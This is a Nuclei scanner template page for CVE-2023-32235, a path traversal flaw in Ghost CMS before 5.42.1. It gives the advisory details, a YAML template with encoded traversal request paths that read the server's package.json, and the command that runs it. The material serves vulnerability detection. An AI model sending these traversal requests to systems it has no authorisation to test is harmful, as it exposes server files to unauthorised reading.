Skip to content
Nuclei Templates

Ghost CMS < 5.42.1 - Path Traversal

ID: CVE-2023-32235

Severity: high

Author: j3ssie

Tags: cve2023,cve,lfi,ghostcms,ghost,node.js

Description

Section titled “Description”

Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme’s folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.

YAML Source

Section titled “YAML Source”
id: CVE-2023-32235


info:
  name: Ghost CMS < 5.42.1 - Path Traversal
  author: j3ssie
  severity: high
  description: |
    Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.
  impact: |
    An attacker can exploit this vulnerability to access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information.
  remediation: Fixed in version 5.42.1
  reference:
    - https://github.com/advisories/GHSA-wf7x-fh6w-34r6
    - https://nvd.nist.gov/vuln/detail/CVE-2023-32235
    - https://github.com/TryGhost/Ghost/commit/378dd913aa8d0fd0da29b0ffced8884579598b0f
    - https://github.com/TryGhost/Ghost/compare/v5.42.0...v5.42.1
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-32235
    cwe-id: CWE-22
    epss-score: 0.01376
    epss-percentile: 0.84873
    cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: ghost
    product: ghost
    framework: node.js
    shodan-query:
      - http.component:"Ghost"
      - http.component:"ghost"
  tags: cve2023,cve,lfi,ghostcms,ghost,node.js


http:
  - method: GET
    path:
      - "{{BaseURL}}/assets/built%2F..%2F..%2F/package.json"
      - "{{BaseURL}}/assets/built%2F..%2F..%2F%E0%A4%A/package.json"


    stop-at-first-match: true


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"name"'
          - '"version"'
          - '"ghost"'
        condition: and


      - type: word
        part: header
        words:
          - "application/json"


      - type: status
        status:
          - 200
# digest: 4a0a004730450220738cd239886e3e8aa6bd457dbcc1c5a012a09cfe43ec7c89395002c7a833b676022100ff965b8420a9e520dda525f98d8a73cefe8c137b732dd16acdd5339385eb37b4:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-32235.yaml"

View on Github